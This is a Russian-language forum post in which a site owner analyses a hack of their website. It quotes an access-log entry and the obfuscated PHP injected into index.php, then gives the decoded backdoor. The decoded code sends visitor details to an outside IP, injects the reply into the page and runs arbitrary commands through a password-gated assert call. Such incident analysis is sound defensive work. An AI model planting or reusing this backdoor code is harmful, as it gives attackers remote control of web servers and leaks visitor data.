Глянул- файл-менегер, выглядит так
в access.log видно, что юзал его кто-то из украины
- Код: Выделить всё
91.220.151.33 - - [04/Jul/2015:13:01:33 +0300] "POST /js/member-5.php HTTP/1.0" 200 12478 "http://craftplay.ru/js/member-5.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17"
IP диапазон: 91.220.151.0 - 91.220.151.255
Название провайдера: FOP Krapko Olexandr Muhaylovich
На этой странице была ссылка на сайт эксплойтов:
По логам FTP никаких подключений не было. Видимо вскрыли через C5
В Index.php находил такое
- Код: Выделить всё
//###=i=###
error_reporting(0);
$strings = "as";$strings .= "sert";
@$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLc ... vLlWqXGftsK0="));'));
//###=i=###
Мой dr.web реагирует на него как на BackDoor
Расшифровываем:
- Код: Выделить всё
if (isset($ibv)) {
echo $ibv;
} else {
if(!empty($_COOKIE["client_check"])) die($_COOKIE["client_check"]);
if(!isset($c_["HTTP_ACCEPT_CHARSET"])){
if(preg_match("!.!u",file_get_contents($_SERVER["SCRIPT_FILENAME"]))){
$c0="UTF-8";
}else{
$c0="windows-1251";
}
}else{
$c0=$c_["HTTP_ACCEPT_CHARSET"];
}
if(function_exists("curl_init")){
$c1=curl_init("http://109.236.81.101/get.php?d=".urlencode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"])."&u=".urlencode($_SERVER["HTTP_USER_AGENT"])."&c=".$c0."&i=1&ip=".$_SERVER["REMOTE_ADDR"]."&h=".md5("5901ac288e42519524e863ffc803aa04".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"].$_SERVER["HTTP_USER_AGENT"].$c0."1"));
curl_setopt($c1,42,false);curl_setopt($c1,19913,true);
$ibv = curl_exec($c1);
curl_close($c1);
}elseif(ini_get("allow_url_fopen")==1){
$ibv = file_get_contents("http://109.236.81.101/get.php?d=".urlencode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"])."&u=".urlencode($_SERVER["HTTP_USER_AGENT"])."&c=".$c0."&i=1&ip=".$_SERVER["REMOTE_ADDR"]."&h=".md5("5901ac288e42519524e863ffc803aa04".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"].$_SERVER["HTTP_USER_AGENT"].$c0."1"));
}
if (isset($ibv)) {
echo $ibv;
}
if(isset($_REQUEST["p"]) && $_REQUEST["p"] == "8bfdcec8") {
@assert($_REQUEST["c"]);
}
}
На мои запросы их сервер никак не отвечает.
ИМХО: это рекламная вставка, которая перекроет сайт рекламой, или отображает рекламу для мобильных устройств